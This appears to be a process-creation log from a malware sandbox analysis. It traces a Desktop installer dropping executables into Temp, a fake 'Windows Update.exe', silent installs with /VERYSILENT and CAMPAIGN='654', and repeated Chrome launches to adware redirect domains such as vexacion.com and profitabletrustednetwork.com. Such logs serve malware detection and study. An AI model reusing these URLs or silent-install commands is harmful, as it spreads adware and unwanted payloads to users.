Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1564,16917623383291386263,6472938917553362493,131072 --lang=en-US --service-sandbox-type=network --enable-audio-service-sandbox --mojo-platform-channel-handle=1856 /prefetch:8
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://vexacion.com/afu.php?zoneid=1343177&var=3
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1536,6457543823163007411,15253291914772866949,131072 --lang=en-US --service-sandbox-type=network --enable-audio-service-sandbox --mojo-platform-channel-handle=1728 /prefetch:8
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://vexacion.com/afu.php?id=1339680
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1532,10546296038144766013,8885457530477492480,131072 --lang=en-US --service-sandbox-type=network --enable-audio-service-sandbox --mojo-platform-channel-handle=1852 /prefetch:8
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://vexacion.com/afu.php?zoneid=1620783&var=3
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://vexacion.com/afu.php?id=1343178
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.cloud-security.xyz/u/script/redirect.php?zoneid=465
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.cloud-security.xyz/u/script/redirect.php?zoneid=466
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1536,5678826982049071516,1403594556980502964,131072 --lang=en-US --service-sandbox-type=network --enable-audio-service-sandbox --mojo-platform-channel-handle=1860 /prefetch:8
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://vexacion.com/afu.php?zoneid=1851483
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://vexacion.com/afu.php?zoneid=1851513
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://www.directdexchange.com/jump/next.php?r=2087215
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.directdexchange.com/jump/next.php?r=4263119
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://vexacion.com/afu.php?id=1294231
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://vexacion.com/afu.php?zoneid=1492888&var=3
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://vexacion.com/afu.php?zoneid=1343177&var=3
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://vexacion.com/afu.php?id=1339680
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://vexacion.com/afu.php?zoneid=1620783&var=3
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://vexacion.com/afu.php?id=1343178
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.cloud-security.xyz/u/script/redirect.php?zoneid=465
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.cloud-security.xyz/u/script/redirect.php?zoneid=466
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6
Source: C:\Program Files (x86)\Windows Multimedia Platform\Windows Update.exe	Process created: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe "C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe"
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://vexacion.com/afu.php?zoneid=1851483
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://vexacion.com/afu.php?zoneid=1851513
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://www.directdexchange.com/jump/next.php?r=2087215
Source: C:\Program Files (x86)\Windows Multimedia Platform\Windows Update.exe	Process created: C:\Users\user\AppData\Local\Temp\c1-1f5b7-b4f-e62a7-a11f96f3c009f\TOHWVYYPNL.exe "C:\Users\user\AppData\Local\Temp\c1-1f5b7-b4f-e62a7-a11f96f3c009f\TOHWVYYPNL.exe"
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.directdexchange.com/jump/next.php?r=4263119
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /k C:\Users\user\AppData\Local\Temp\uau4vlym.1bx\installer.exe /qn CAMPAIGN="654" & exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://vexacion.com/afu.php?id=1294231
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\uau4vlym.1bx\installer.exe C:\Users\user\AppData\Local\Temp\uau4vlym.1bx\installer.exe /qn CAMPAIGN="654"
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://vexacion.com/afu.php?zoneid=1492888&var=3
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://vexacion.com/afu.php?zoneid=1343177&var=3
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://vexacion.com/afu.php?id=1339680
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://vexacion.com/afu.php?zoneid=1620783&var=3
Source: C:\Users\user\Desktop\1nJGU59JPU.exe	Process created: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp "C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp" /SL5="$22016E,506086,422400,C:\Users\user\Desktop\1nJGU59JPU.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Process created: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe "C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe" /S /UID=rec7	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe	Process created: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe "C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe	Process created: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe "C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe	Process created: C:\Program Files\internet explorer\ROOKKLCFJB\irecord.exe "C:\Program Files\internet explorer\ROOKKLCFJB\irecord.exe" /VERYSILENT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://vexacion.com/afu.php?zoneid=1851483	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://vexacion.com/afu.php?zoneid=1851513	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://www.directdexchange.com/jump/next.php?r=2087215	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.directdexchange.com/jump/next.php?r=4263119	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://vexacion.com/afu.php?id=1294231	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://vexacion.com/afu.php?zoneid=1492888&var=3	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://vexacion.com/afu.php?zoneid=1343177&var=3	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://vexacion.com/afu.php?id=1339680	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://vexacion.com/afu.php?zoneid=1620783&var=3	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://vexacion.com/afu.php?id=1343178	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.cloud-security.xyz/u/script/redirect.php?zoneid=465	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.cloud-security.xyz/u/script/redirect.php?zoneid=466	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://vexacion.com/afu.php?zoneid=1851483	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://vexacion.com/afu.php?zoneid=1851513	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://www.directdexchange.com/jump/next.php?r=2087215	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.directdexchange.com/jump/next.php?r=4263119	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://vexacion.com/afu.php?id=1294231	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://vexacion.com/afu.php?zoneid=1492888&var=3	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://vexacion.com/afu.php?zoneid=1343177&var=3	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://vexacion.com/afu.php?id=1339680	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://vexacion.com/afu.php?zoneid=1620783&var=3	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://vexacion.com/afu.php?id=1343178	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.cloud-security.xyz/u/script/redirect.php?zoneid=465	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.cloud-security.xyz/u/script/redirect.php?zoneid=466	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://vexacion.com/afu.php?zoneid=1851483	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://vexacion.com/afu.php?zoneid=1851513	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://www.directdexchange.com/jump/next.php?r=2087215	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.directdexchange.com/jump/next.php?r=4263119	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://vexacion.com/afu.php?id=1294231	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://vexacion.com/afu.php?zoneid=1492888&var=3	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://vexacion.com/afu.php?zoneid=1343177&var=3	Jump to behavior
Source: C:\Program Files (x86)\Windows Multimedia Platform\ZHunuhebaqu.exe	Process created: C:\Program Files (x86)\Windows Multimedia Platform\Windows Update.exe "C:\Program Files (x86)\windows multimedia platform\Windows Update.exe"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1556,9627623661114225042,16842326924946872670,131072 --lang=en-US --service-sandbox-type=network --enable-audio-service-sandbox --mojo-platform-channel-handle=1908 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /k C:\Users\user\AppData\Local\Temp\uau4vlym.1bx\installer.exe /qn CAMPAIGN="654" & exit
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
